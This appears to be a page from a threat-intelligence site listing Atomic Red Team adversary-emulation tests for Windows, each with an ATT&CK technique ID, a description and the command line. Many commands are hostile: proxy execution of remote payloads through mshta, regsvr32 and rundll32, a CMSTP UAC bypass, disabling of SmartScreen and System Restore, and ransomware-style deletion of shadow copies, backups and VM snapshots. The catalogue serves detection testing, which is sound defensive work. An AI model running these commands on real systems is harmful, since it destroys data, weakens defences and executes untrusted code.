T1218 command_prompt windows Provlaunch.exe Executes Arbitrary Command via Registry Key
System Binary Proxy Execution
Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command. - https://twitter.com/0gtweet/status/1674399582162153472 - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ Registry keys are deleted after successful execution.
reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin
T1218.001 command_prompt windows Compiled HTML Help Local Payload
Compiled HTML File
Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open
hh.exe "#{local_chm_file}"
T1218.001 command_prompt windows Compiled HTML Help Remote Payload
Compiled HTML File
Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open
hh.exe #{remote_chm_file}
T1218.001 command_prompt windows Decompile Local CHM File
Compiled HTML File
Uses hh.exe to decompile a local compiled HTML Help file. Upon successful execution the chm file will decompile to disk. Reference:https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
hh.exe -decompile %temp% "#{local_chm_file}"
T1218.002 command_prompt windows Control Panel Items
Control Panel
This test simulates an adversary leveraging control.exe Upon execution calc.exe will be launched
control.exe "#{cpl_file_path}"
T1218.003 command_prompt windows CMSTP Executing Remote Scriptlet
CMSTP
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
cmstp.exe /s "#{inf_file_path}"
T1218.003 command_prompt windows CMSTP Executing UAC Bypass
CMSTP
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
cmstp.exe /s "#{inf_file_uac}" /au
T1218.005 command_prompt windows Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
Mshta
Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
T1218.005 command_prompt windows Mshta executes VBScript to execute malicious command
Mshta
Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information.
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
T1218.005 command_prompt windows Mshta used to Execute PowerShell
Mshta
Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>'"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with embedded JScript
Msiexec
Executes an MSI containing embedded JScript code using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with embedded VBScript
Msiexec
Executes an MSI containing embedded VBScript code using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with an embedded DLL
Msiexec
Executes an MSI containing an embedded DLL using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with an embedded EXE
Msiexec
Executes an MSI containing an embedded EXE using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute the DllRegisterServer function of a DLL
Msiexec
Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
#{msi_exe} /y "#{dll_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Msiexec
Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
#{msi_exe} /z "#{dll_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Remote MSI file
Msiexec
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
#{msi_exe} /q /i "#{msi_payload}"
T1218.008 command_prompt windows Odbcconf.exe - Execute Arbitrary DLL
Odbcconf
Execute arbitrary DLL file stored locally.
odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
T1218.008 command_prompt windows Odbcconf.exe - Load Response File
Odbcconf
Execute arbitrary response file that will spawn PowerShell.exe. Source files: https://github.com/woanware/application-restriction-bypasses
cd "#{rsp_file_path}"
odbcconf.exe -f "#{rsp_file_name}"
T1218.009 command_prompt windows Regasm Uninstall Method Call Test
Regsvcs/Regasm
Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library "#{source_file}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
T1218.010 command_prompt windows Regsvr32 local COM scriptlet execution
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
#{regsvr32path}\#{regsvr32name} /s /u /i:"#{filename}" scrobj.dll
T1218.010 command_prompt windows Regsvr32 remote COM scriptlet execution
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
#{regsvr32path}\#{regsvr32name} /s /u /i:#{url} scrobj.dll
T1218.010 command_prompt windows Regsvr32 local DLL execution
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
T1218.010 command_prompt windows Regsvr32 Registering Non DLL
Regsvr32
Replicating observed Gozi maldoc behavior registering a dll with an altered extension
#{regsvr32path}\#{regsvr32name} /s #{dll_file}
T1218.010 command_prompt windows Regsvr32 Silent DLL Install Call DllRegisterServer
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
#{regsvr32path}\#{regsvr32name} /s /i "#{dll_name}"
T1218.011 command_prompt windows Rundll32 execute JavaScript Remote Payload With GetObject
Rundll32
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/) Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
T1218.011 command_prompt windows Rundll32 execute VBscript command
Rundll32
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
T1218.011 command_prompt windows Rundll32 execute VBscript command using Ordinal number
Rundll32
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched
rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
T1218.011 command_prompt windows Rundll32 advpack.dll Execution
Rundll32
Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched
rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
T1218.011 command_prompt windows Rundll32 ieadvpack.dll Execution
Rundll32
Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
T1218.011 command_prompt windows Rundll32 syssetup.dll Execution
Rundll32
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}"
T1218.011 command_prompt windows Rundll32 setupapi.dll Execution
Rundll32
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}"
T1218.011 command_prompt windows Execution of HTA and VBS Files using Rundll32 and URL.dll
Rundll32
IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
T1218.011 command_prompt windows Launches an executable using Rundll32 and pcwutl.dll
Rundll32
Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
T1218.011 command_prompt windows Rundll32 with Ordinal Value
Rundll32
Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. Upon successful execution, Calc.exe will spawn.
rundll32.exe "#{input_file}",#2
T1218.011 command_prompt windows Rundll32 with Control_RunDLL
Rundll32
Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444.
rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"
T1218.011 command_prompt windows Rundll32 with desk.cpl
Rundll32
Rundll32.exe loading an executable renamed as .scr using desk.cpl Reference: - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/) SIGMA rules: - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml) - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
copy #{exe_to_launch} not_an_scr.scr
rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
T1218.011 command_prompt windows Running DLL with .init extension and function
Rundll32
This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. DLL created with the AtomicTestHarnesses Portable Executable Builder script.
rundll32.exe #{dll_file},krnl
T1218.011 command_prompt windows Rundll32 execute command via FileProtocolHandler
Rundll32
Test execution of a command using rundll32.exe and the FileProtocolHandler technique. Upon execution, calc.exe will be launched. This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
T1220 command_prompt windows MSXSL Bypass using local files
XSL Script Processing
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL. No longer available from Microsoft. (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) Open Calculator.exe when test successfully executed, while AV turned off.
"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
T1220 command_prompt windows MSXSL Bypass using remote files
XSL Script Processing
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL.exe. No longer available from Microsoft. (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) Open Calculator.exe when test successfully executed, while AV turned off.
"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
T1220 command_prompt windows WMIC bypass using local XSL file
XSL Script Processing
Executes the code specified within a XSL script using a local payload.
wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
T1220 command_prompt windows WMIC bypass using remote XSL file
XSL Script Processing
Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.
wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
T1221 command_prompt windows WINWORD Remote Template Injection
Template Injection
Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
start "#{docx_file}"
T1222 command_prompt elevated windows Enable Local and Remote Symbolic Links via fsutil
File and Directory Permissions Modification
Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
fsutil behavior set SymlinkEvaluation R2L:1
fsutil behavior set SymlinkEvaluation R2R:1
T1222 command_prompt elevated windows Enable Local and Remote Symbolic Links via reg.exe
File and Directory Permissions Modification
Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d "1" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d "1" /f
T1222.001 command_prompt windows Take ownership using takeown utility
Windows Permissions
Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it.
takeown.exe /f #{file_folder_to_own} /r
T1222.001 command_prompt windows cacls - Grant permission to specified user or group recursively
Windows Permissions
Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files" will be displayed.
icacls.exe #{file_or_folder} /grant #{user_or_group}:F
T1222.001 command_prompt windows attrib - Remove read-only attribute
Windows Permissions
Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty.
attrib.exe -r #{file_or_folder}\*.* /s
T1222.001 command_prompt windows attrib - hide file
Windows Permissions
Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file.
mkdir #{file_or_folder} >nul 2>&1
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
T1222.001 command_prompt elevated windows Grant Full Access to folder for Everyone - Ryuk Ransomware Style
Windows Permissions
Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. *icacls "C:\" /grant Everyone:F /T /C /Q* However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\" if you prefer.
icacls "#{path}" /grant Everyone:F /T /C /Q
T1222.001 command_prompt elevated windows SubInAcl Execution
Windows Permissions
This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"
T1482 command_prompt windows Windows - Discover domain trusts with dsquery
Domain Trust Discovery
Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
dsquery * -filter "(objectClass=trustedDomain)" -attr *
T1482 command_prompt windows Windows - Discover domain trusts with nltest
Domain Trust Discovery
Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family.
nltest /domain_trusts
nltest /trusted_domains
T1482 command_prompt windows Adfind - Enumerate Active Directory OUs
Domain Trust Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=organizationalUnit) #{optional_args}
T1482 command_prompt windows Adfind - Enumerate Active Directory Trusts
Domain Trust Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -gcb -sc trustdmp
T1482 command_prompt windows TruffleSnout - Listing AD Infrastructure
Domain Trust Discovery
Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
"#{trufflesnout_path}" forest -n #{domain}
"#{trufflesnout_path}" domain -n #{domain}
T1484.001 command_prompt elevated windows LockBit Black - Modify Group policy settings -cmd
Group Policy Modification
An adversary can modify the group policy settings.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
T1485 command_prompt windows Overwrite deleted data on C drive
Data Destruction
RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover. This process is very slow and test execution may timeout. https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4
cipher.exe /w:C:
T1485 command_prompt windows ESXi - Delete VM Snapshots
Data Destruction
Deletes all snapshots for all Virtual Machines on an ESXi Host [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done"
T1486 command_prompt elevated windows PureLocker Ransom Note
Data Encrypted for Impact
building the IOC (YOUR_FILES.txt) for the PureLocker ransomware https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
T1486 command_prompt elevated windows Data Encrypt Using DiskCryptor
Data Encrypted for Impact
DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It's important to note that a system reboot is necessary as part of the installation.
""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}"
T1489 command_prompt elevated windows Windows - Stop service using Service Controller
Service Stop
Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be started by running the cleanup command.
sc.exe stop #{service_name}
T1489 command_prompt elevated windows Windows - Stop service using net.exe
Service Stop
Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command.
net.exe stop #{service_name}
T1489 command_prompt windows Windows - Stop service by killing process
Service Stop
Stops a specified service killng the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command.
taskkill.exe /f /im #{process_name}
T1490 command_prompt elevated windows Windows - Delete Volume Shadow Copies
Inhibit System Recovery
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
vssadmin.exe delete shadows /all /quiet
T1490 command_prompt elevated windows Windows - Delete Volume Shadow Copies via WMI
Inhibit System Recovery
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
wmic.exe shadowcopy delete
T1490 command_prompt elevated windows Windows - wbadmin Delete Windows Backup Catalog
Inhibit System Recovery
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
wbadmin delete catalog -quiet
T1490 command_prompt elevated windows Windows - Disable Windows Recovery Console Repair
Inhibit System Recovery
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the powershell session.
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
T1490 command_prompt elevated windows Windows - Delete Backup Files
Inhibit System Recovery
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try to delete files from around the system.
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
T1490 command_prompt elevated windows Windows - wbadmin Delete systemstatebackup
Inhibit System Recovery
Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
wbadmin delete systemstatebackup -keepVersions:0
T1490 command_prompt elevated windows Windows - Disable the SR scheduled task
Inhibit System Recovery
Use schtasks.exe to disable the System Restore (SR) scheduled task
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
T1490 command_prompt elevated windows Disable System Restore Through Registry
Inhibit System Recovery
Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
T1490 command_prompt elevated windows Modify VSS Service Permissions
Inhibit System Recovery
This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows: - Deny Generic All (GA) permissions to Network Users (NU) - Deny GA permissions to Everyone (WD) - Deny GA permissions to Anonymous (AN) - Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL) - Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges. A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)
T1491.001 command_prompt windows ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
Internal Defacement
Changes the ESXi welcome message to potentially display ransom information. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#change%20display%20information)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"
T1505.003 command_prompt windows Web Shell Written to Disk
Web Shell
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1505.004 command_prompt windows Install IIS Module using AppCmd.exe
IIS Components
The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed. This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/). A successful execution will install a module into IIS using AppCmd.exe. [Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe) [IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
%windir%\system32\inetsrv\appcmd.exe install module /name:#{module_name} /image:#{dll_path}
T1518 command_prompt windows Find and Display Internet Explorer Browser Version
Software Discovery
Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed.
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
T1518.001 command_prompt windows Security Software Discovery
Security Software Discovery
Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles and specific security software.
netsh.exe advfirewall  show allprofiles 
netsh.exe advfirewall firewall dump
netsh.exe advfirewall show currentprofile
netsh.exe advfirewall firewall show rule name=all
netsh.exe firewall show state
netsh.exe firewall show config
sc query windefend
powershell.exe /c "Get-Process | Where-Object { $_.ProcessName -eq 'Sysmon' }"
powershell.exe /c "Get-Service | where-object {$_.DisplayName -like '*sysm*'}"
powershell.exe /c "Get-CimInstance Win32_Service -Filter 'Description = ''System Monitor service'''"
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
tasklist.exe | findstr /i defender
tasklist.exe | findstr /i cylance
tasklist.exe | findstr /i mc
tasklist.exe | findstr /i "virus cb defender cylance mc"
T1518.001 command_prompt elevated windows Security Software Discovery - Sysmon Service
Security Software Discovery
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
fltmc.exe | findstr.exe 385201
T1518.001 command_prompt elevated windows Security Software Discovery - AV Discovery via WMI
Security Software Discovery
Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software.
wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin